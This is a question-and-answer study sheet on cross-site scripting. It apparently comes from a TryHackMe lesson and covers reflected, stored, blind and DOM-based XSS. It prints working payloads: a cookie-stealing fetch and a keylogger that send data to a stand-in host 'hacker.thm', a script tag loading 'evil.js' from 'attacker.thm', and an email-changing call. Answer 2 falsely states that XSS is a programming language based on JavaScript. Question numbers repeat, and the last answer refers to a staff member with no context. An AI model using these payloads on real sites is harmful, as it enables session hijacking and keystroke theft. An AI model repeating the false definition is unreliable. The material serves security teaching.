Cross-Site Scripting

Question 1

What is Cross-Site Scripting?

Answer 1

Cross-Site Scripting is also known as XSS, is a type of injection attack where the attacker injects malicious javascript code into a web application thats meant to be executed by other users.

Question 2

What is XSS?

Answer 2

XSS is a programming language thats based off of Javascript.

Question 3

Whats an XSS payload?

Answer 3

A XSS payload is the java script that you wish to be executed by the target user

Question 4

What are the 2 parts of an XSS payload?

Answer 4

The 2 parts of an XSS payload are The Intention and The Modification.

Question 5

What is the purpose of The Intention?

Answer 5

The Intention is what we actually want the javascript code to do.

Question 6

What is the purpose of The Modification?

Answer 6

These are the actual changes that we make to the javascript to make it execute.

Question 7

What are some examples of Intentions?

Answer 7

Some examples include: Proof of Concept, Session Stealing, Key Logging, and Business Logic

Question 8

What is Proof of Concept?

Answer 8

This is the simplest form of payload where all your really doing is trying to confirm whether or not you can achieve XSS; normally this is done in the form of a pop with a message.

Question 9

What would a payload for Proof of Concept look like?

Answer 9

<script>
alert('XSS Payload');
</script>

Question 10

What is Session Stealing?

Answer 10

Details of a users session such as login tokens are often kept in cookies on the target machine; there’s javascript code that can take those target cookies and encode them to ensure successful transmission and post it to a hacker controlled website to be logged.

Question 11

What does a payload for Session Stealing look like?

Answer 11

<script>
fetch('http://hacker.thm/steal?cookie= ' + btoa(document.cookie));
</script>

Question 12

What is a Key Logger?

Answer 12

Anything that you type on a website with an established XSS, will be forwarded to a website under hackers control.

Question 13

What does the payload for a Key Logger look like?

Answer 13

<script>
document.onkeypress= function(e){fetch('https://hacker.thm/log?key=' + btoa(e.key));}
</script>

Question 14

What is Business Logic?

Answer 14

This a much more specific form of XSS targeting mostly key staff in business positions, its basically just executing a JS function or network resource.

Question 15

Whats an example of Business Logic?

Answer 15

A Goode example to think about would be a JS function thats used for changing the users email address called user.changeEmail();

Question 16

What would a payload for this actually look like?

Answer 16

<script>
user.changeEmail('attacker@hacker.thm');
</script>

Question 17

What is Reflected XSS?

Answer 17

Reflected XSS happens when user-supplied data is included in the webpage source without any validation.

Question 18

What’s an example of Reflected XSS?

Answer 18

Say the user inserts an incorrect input into the website and an error message is displayed. If you check the source code on the error, you’ll find that it was constructed differently. Now say that the application doesn’t check the contents of the error parameter, allowing the attacker to insert malicious code into the error.

Question 19

Can you write an example of this in practice?

Answer 19

<div>
<p>'Invalid Input'</p>
</div>

after injection:

<div>
<p><script src=https://attacker.thm/evil.js></script></p>
</div>

Simply remove the contents of the <p> tag and replace it with it XSS script.

Question 20

What is Stored XSS?

Answer 20

As the name suggest, the XSS payload is stored on the web application(in a database for example) and then gets executed only after anther users visits the application.

Question 21

What is Blind XSS?

Answer 21

Blind XSS is basically the same as Stored XSS, being that it’s stored on a web application for another user to view, however in this instance you won’t be able to see the payload work or test to see if it works.

Question 22

Whats an example of Blind XSS?

Answer 22

Let’s say a website has a contact form where you can message a member of staff; often times these messages that you send to staff aren’t checked for malicious code, which allows the attacker to enter in anything that they want. These messages will then get turned into support tickets.

Question 23

What does DOM stand for and mean?

Answer 23

DOM stands for Document Object Model and is a programming interface for HTML and XML documents. Through this a webpage can become a document, and that document can be viewed on a browser or open source HTML.

Question 23

What is DOM Based XSS?

Answer 23

DOM Based XSS is where the javascript execution happens directly in the browser without any new pages being loaded or data submitted by backend code.

Question 23

Whats an example of Stored XSS?

Answer 23

Look at a blog website or any other site that allows its user to submit comments, unfortunately a lot of these applications won’t filter the user submitted comments for malicious code. These comments will be saved on the sites database and then run when other users view the comment or visit the site.

Question 23

What are the consequences of this on the user?

Answer 23

The biggest issue here is that its possible for the attacker to end up hijacking the staff members session.